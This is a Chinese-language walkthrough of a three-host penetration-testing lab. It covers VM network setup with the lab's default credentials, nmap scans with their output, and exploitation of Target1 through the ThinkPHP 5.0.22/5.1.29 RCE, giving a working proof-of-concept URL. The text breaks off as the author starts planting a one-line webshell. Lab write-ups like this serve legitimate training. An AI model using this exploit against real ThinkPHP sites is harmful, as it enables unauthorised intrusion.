<1>靶场介绍及环境配置

三个主机的网络环境拓扑图，攻击机的网段在192.168.236.0/24，三台靶机的IP地址分别如图：

上面的 Target1、2、3分别对应CentOS7、Ubuntu、Windows7 三台主机。

(1)网卡配置

注意：在编辑虚拟网卡的时候，不要勾选红圈那个选项，否则后面代理就就没有意义了。.ova文件导入到VM之后可以打开虚拟机，使用root:teamssix.com登录主机，通过ifconfig检查网络情况是否正常。

(2)宝塔配置

其中Target1和Target2主机需要我们自己去宝塔后台配置一下（靶机描述信息里有密码 root:teamssix.com）：
进入宝塔面板，选择网站，再点击网站名，将centos靶机中c段为236的那个ip添加进去，确保能够访问到对应的web页面

<2>Target1

(1)nmap扫描存活主机

#扫描段内存活主机
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.236.0/24   
Nmap scan report for 192.168.236.141 (192.168.236.141)
Host is up (0.00019s latency).

#nmap扫描一下 Target1 开放的服务
┌──(root㉿kali)-[~]
└─# nmap -A -p 1-65535 192.168.236.141
Nmap scan report for 192.168.236.141 (192.168.236.141)
Host is up (0.00082s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    nginx
111/tcp  open  rpcbind 2-4 (RPC #100000)
888/tcp  open  http    nginx
3306/tcp open  mysql   MySQL (unauthorized)
8888/tcp open  http    Ajenti http control panel
MAC Address: 00:0C:29:61:BA:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

可以看见开放了 21、22、80、111等等端口，我们访问一下80的http服务
访问192.168.236.141 站点不存在，192.168.236.141/index.php 404 是因为宝塔后台配置的原因，按照前面提到的宝塔配置之后就不会出现这个情况。

(2)利用thinkphp-5.0.22 RCE漏洞拿shell

访问80端口开放的http服务

访问后发现这是一个用thinkphp5版本搭建的网站，thinkphp5版本是有漏洞的，这里我们直接上thinkphpGUI工具，检测一下，发现存在ThinkPHP 5.0.22/5.1.29 RCE

poc为：http://192.168.236.141/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

直接GetShell没通，无伤大雅，那我们执行命令去生成一个一句话木